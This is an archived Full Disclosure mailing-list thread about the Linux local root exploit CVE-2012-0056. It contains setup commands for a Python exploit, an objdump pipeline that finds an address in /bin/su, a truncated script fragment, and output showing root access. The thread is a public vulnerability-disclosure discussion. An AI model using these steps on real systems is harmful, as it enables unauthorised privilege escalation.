Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Linux Local Root -- CVE-2012-0056 -- Detailed Write-up
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Mon, 23 Jan 2012 02:30:44 +0100

NICE! Well, I guess posting that blog post defeated the point of not
publishing. :-D

So, here's my code:

I wrote the shellcode by hand too, and you can grab the 32 and 64 bit
versions from that same tree.

Have fun.

BTW, before I'm asked, the reason why I don't hard code 12 for the
length of the su error string is that it's different on different

On Mon, Jan 23, 2012 at 02:14, sd <sd () fucksheep org> wrote:
2012/1/23 Jason A. Donenfeld <Jason () zx2c4 com>:
Server presently DoS'd, or dreamhost is tweaking again.

boring tl;dr - don't play kaminsky on us :)

# CVE-2012-0056 amd64
# sd () fucksheep org
# hg clone https://code.google.com/p/python-passfd
# cd python-passfd; ./setup.py build_ext --inplace; cd src
# mv ~/hurrdurr.py .
# ./hurrdurr.py `objdump -d /bin/su|grep 'exit () plt'|head -n 1|cut -d '
' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
from socket import *
from passfd import *
from os import *
from socket import *
from sys import *
from time import *
if argv[-1]=='hax':
       if not fork():

./hurrdurr.py `objdump -d /bin/su|grep 'exit () plt'|head -n 1|cut -d ' '
-f 1|sed 's/^[0]*\([^0]*\)/0x\1/'`
uid=0(root) gid=1000(sd)

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]